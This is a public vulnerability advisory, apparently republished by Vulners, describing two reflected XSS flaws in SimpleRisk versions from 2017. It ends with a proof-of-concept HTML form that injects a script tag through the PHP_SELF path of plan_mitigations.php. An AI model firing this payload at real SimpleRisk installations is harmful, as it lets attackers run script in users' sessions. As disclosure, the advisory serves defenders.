SimpleRisk v20170416-001 Reflected XSS Vulnerabilities, impacting versions 20170416-001, 20170108-001, and 20170102-001. Allows execution of arbitrary HTML and script code in user's browser session
<!--
SimpleRisk v20170416-001 Reflected XSS Vulnerabilities
Vendor: SimpleRisk, LLC
Product web page: https://www.simplerisk.com
Affected version: 20170416-001
20170108-001
20170102-001
Summary: SimpleRisk is an open-source risk management system released
under Mozilla Public License and used for risk management activities.
It enables risk managers to account for risks, plan mitigation measures,
facilitate management reviews, prioritize for project planning, and track
periodic reviews.
Desc: SimpleRisk suffers from two reflected cross-site scripting vulnerabilities
when input passed via 'draw' POST parameter and the 'PHP_SELF' variable is not
properly sanitized before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in context of
an affected site.
Tested on: PHP/5.5.9-1ubuntu4.20
Apache/2.4.7 (Ubuntu)
MySQL 14.14 (Distrib 5.5.53 for debian-linux-gnu)
Ubuntu 14.04.5 LTS
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5414
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5414.php
05.06.2017
--><html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://192.168.1.72/management/plan_mitigations.php/'><script>alert(1)</script>">
<input name="currentpage" type="hidden" value="/ZSL"/>
<input type="submit" value="XSS #1"/>
</form>
</body>
</html><html><p>
=====
</p></html>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo